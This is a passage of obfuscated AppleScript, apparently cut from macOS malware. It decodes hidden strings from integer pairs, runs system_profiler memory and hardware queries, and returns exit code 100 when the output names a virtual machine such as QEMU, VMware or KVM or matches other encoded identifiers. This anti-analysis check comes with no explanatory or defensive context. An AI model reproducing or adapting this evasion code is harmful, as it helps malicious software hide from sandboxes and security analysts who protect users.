set firuqu to ""
set miwwbftx to 0
repeat with mivqor from 1 to count of hadzhi
set miwwbftx to (miwwbftx + (item mivqor of hadzhi)) mod 9999
set firuqu to firuqu & (character id ((item mivqor of hadzhi) - (item mivqor of uytcjk)))
end repeat
return firuqu
end qbibeltf
set eyvevhkvz to qbibeltf({194, 208, 223, 249, 180, 342, 320, 316, 196, 199, 156, 197, 308, 158, 196}, {79, 87, 108, 133, 79, 233, 225, 204, 82, 88, 54, 92, 200, 57, 82}) & " " & qbibeltf({241, 205, 256, 255, 219, 306, 244, 326, 174, 147, 168, 215, 237, 270, 305, 264}, {158, 125, 179, 154, 110, 195, 130, 205, 106, 50, 52, 118, 153, 149, 193, 163})
set tqbxvgfjop to qbibeltf({194, 208, 223, 249, 180, 342, 320, 316, 196, 199, 156, 197, 308, 158, 196}, {79, 87, 108, 133, 79, 233, 225, 204, 82, 88, 54, 92, 200, 57, 82}) & " " & qbibeltf({256, 275, 188, 170, 186, 278, 249, 152, 215, 170, 171, 183, 326, 336, 220, 318, 340, 320}, {173, 195, 116, 73, 72, 178, 130, 55, 101, 69, 103, 86, 210, 239, 136, 197, 228, 219})
set tydmfynqqy to do shell script eyvevhkvz
set ymqldgr to do shell script tqbxvgfjop
if ymqldgr contains qbibeltf({148, 124, 141, 275, 235, 195, 309, 166, 175, 246}, {58, 54, 89, 207, 151, 121, 227, 98, 98, 176}) then
do shell script "exit 0"
return
end if
set gxvbknwo to {qbibeltf({208, 224, 134, 300}, {127, 155, 57, 215}), qbibeltf({249, 292, 328, 237, 296, 173}, {163, 215, 209, 140, 182, 72}), qbibeltf({313, 272, 231}, {238, 186, 154})}
set fqjwud to {qbibeltf({302, 193, 135, 291, 299, 238, 330, 169, 276, 250}, {212, 142, 86, 221, 227, 150, 241, 88, 228, 176}), qbibeltf({160, 151, 146, 211, 224, 157, 235, 157, 196, 138, 247, 177}, {93, 103, 91, 127, 171, 109, 179, 73, 125, 89, 173, 127}), qbibeltf({270, 255, 150, 260, 201, 260, 208, 264, 297, 271, 227, 170}, {203, 207, 100, 176, 124, 210, 118, 198, 225, 183, 171, 115}), qbibeltf({260, 273, 338, 224, 120, 272, 187, 256, 179, 284, 258, 260, 350}, {193, 169, 233, 112, 62, 240, 102, 146, 72, 174, 147, 141, 240}), qbibeltf({196, 215, 225, 188, 351, 158, 300, 245, 333, 273, 244, 108}, {123, 105, 109, 87, 243, 126, 233, 134, 219, 172, 212, 58}), qbibeltf({243, 218, 337, 260, 279, 208, 338, 199, 309, 268, 290, 343, 346, 346, 272}, {157, 113, 223, 144, 162, 111, 230, 167, 232, 171, 191, 239, 241, 236, 171}), qbibeltf({137, 341, 328, 302, 338, 213, 168, 287, 281, 319}, {51, 236, 214, 186, 221, 116, 60, 210, 184, 220}), qbibeltf({153, 195, 223, 217, 266, 270, 271, 219, 231}, {113, 109, 118, 103, 150, 153, 174, 111, 190})}
set dirzmgemnu to false
repeat with scclfiwe in gxvbknwo
if tydmfynqqy contains scclfiwe then
set dirzmgemnu to true
exit repeat
end if
end repeat
if not dirzmgemnu then
repeat with scclfiwe in fqjwud
if ymqldgr contains scclfiwe then
set dirzmgemnu to true
exit repeat
end if
end repeat
end if
if dirzmgemnu then
do shell script "exit 100"
else
do shell script "exit 0"
end if
'